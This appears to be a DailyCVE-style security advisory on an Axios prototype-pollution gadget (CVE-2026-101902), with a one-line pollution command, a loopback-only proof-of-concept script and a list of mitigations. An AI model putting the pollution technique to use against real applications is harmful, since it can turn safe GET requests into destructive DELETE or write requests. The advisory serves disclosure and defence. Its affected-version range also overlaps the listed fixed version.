Axios, Prototype Pollution Gadget, CVE-2026-101902 (Medium) -DC-Sep2026-2666

Listen to this Post

CVE-2026-101902 is a read-side prototype pollution gadget affecting the Axios HTTP client library. The vulnerability resides in the default Axios instance, where request method resolution reads fallback values from `this.defaults` without an own-property guard. When a separate prototype pollution primitive in the same Node.js process sets Object.prototype.method, any default-instance request that omits an explicit method will inherit that value and send an attacker-controlled HTTP method instead of the expected GET. This affects calls such as `axios.request({ url })` and the shorthand axios({ url }). The issue is not that Axios itself introduces prototype pollution; rather, Axios becomes dangerous after `Object.prototype` has already been polluted by another bug. The vulnerable code path is in lib/core/Axios.js, where the method fallback is resolved as (config.method || this.defaults.method || 'get'). Because `this.defaults` is a normal object that inherits from Object.prototype, a polluted `method` property can override the default GET. The same unsafe inherited-property pattern also affects this.defaults.allowAbsoluteUrls, which can alter how absolute URLs are combined with baseURL. The merged request config is created as a null-prototype object in lib/core/mergeConfig.js, so `config.method` itself is protected from prototype pollution. However, the fallback read from `this.defaults` remains exposed. Local verification on Axios 1.17.0 demonstrated that after setting Object.prototype.method = "DELETE", a default-instance request reached a loopback server as DELETE, while method aliases such as `axios.get()` and explicit-method requests remained GET. An instance created with `axios.create()` also remained unaffected. The vulnerability is classified as CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes) and carries a CVSS 4.0 base score of 6.9 (Medium). The issue is fixed in Axios versions 0.34.0 and 1.20.0. Exploitation requires a pre-existing prototype-pollution path in the application; Axios does not provide that path itself.

DailyCVE Form:

Platform: Node.js Axios
Version: 0.27.2-1.20.0
Vulnerability : Prototype Pollution Gadget
Severity: Medium
date: 2026-09-28

Prediction: 2026-10-15

What Undercode Say:

Analytics:

Check installed Axios version
npm list axios
Simulate prototype pollution in a Node.js process
node -e "Object.prototype.method = 'DELETE'; console.log('polluted');"
Verify vulnerable fallback read in source
grep -n "this.defaults.method" node_modules/axios/lib/core/Axios.js

Exploit: (Educational Purposes!)

// validate-prototype-method-gadget.mjs
import http from "node:http";
import axios from "axios";
async function listen(server) {
await new Promise((resolve) => server.listen(0, "127.0.0.1", resolve));
return server.address().port;
}
async function runRequest(label, requestFn) {
const hits = [];
const server = http.createServer((req, res) => {
hits.push({ method: req.method, url: req.url });
res.writeHead(200, { "content-type": "application/json" });
res.end(JSON.stringify({ ok: true }));
});
const port = await listen(server);
const url = <code>http://127.0.0.1:${port}/${label}`;
try {
await requestFn(url);
} catch (err) {
// handle error
}
server.close();
return { label, hits };
}
const results = [];
Object.prototype.method = "DELETE";
try {
results.push(await runRequest("default-request-no-method", (url) => axios.request({ url })));
results.push(await runRequest("default-shorthand-no-method", (url) => axios({ url })));
results.push(await runRequest("default-get-alias", (url) => axios.get(url)));
results.push(await runRequest("default-request-explicit-get", (url) => axios.request({ url, method: "GET" })));
const instance = axios.create();
results.push(await runRequest("created-instance-request-no-method", (url) => instance.request({ url })));
} finally {
delete Object.prototype.method;
}
console.log(results);

<h2 class=”f1b-anim” style=”color:#3b82f6;border-left:4px solid #3b82f6;padding-left:12px;margin:22px 0 10px 0;font-weight:bold”>Protection: from this CVE</h2>
– Upgrade Axios to version 0.34.0 or 1.20.0 (or later).
– Avoid using default-instance shorthand `axios({ url })` or `axios.request({ url })` when the method is not explicitly set.
– Always specify an explicit method, e.g.,axios.request({ url, method: “GET” }).
- Use method aliases such as `axios.get(url)` or `axios.post(url)` which are not affected by the method override path.
- Create isolated instances with `axios.create()` and set defaults explicitly on the instance.
- Implement own-property checks in custom merge logic if you maintain a fork.
- Monitor dependencies for prototype pollution primitives that could set
Object.prototype.method.
- Run Node.js processes with `--disable-proto=throw` to prevent prototype pollution.
<h2 class="f1b-anim" style="color:#3b82f6;border-left:4px solid #3b82f6;padding-left:12px;margin:22px 0 10px 0;font-weight:bold">Impact:</h2>
- Unauthorized state-changing requests: `GET` can become
DELETE,POST,PUT, orPATCH`.
– Deletion of resources, unintended writes, data corruption, or denial of service.
– Impact depends on the target endpoint and whether the HTTP method is treated as security-relevant.
– Does not require admin access to Axios itself, but requires an existing prototype-pollution path in the application.
– Applications that always use explicit methods, method aliases, or isolated instances are not affected by the confirmed method-override path.
– The vulnerability is a gadget, not a standalone exploit; it amplifies the impact of a primary prototype pollution flaw.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top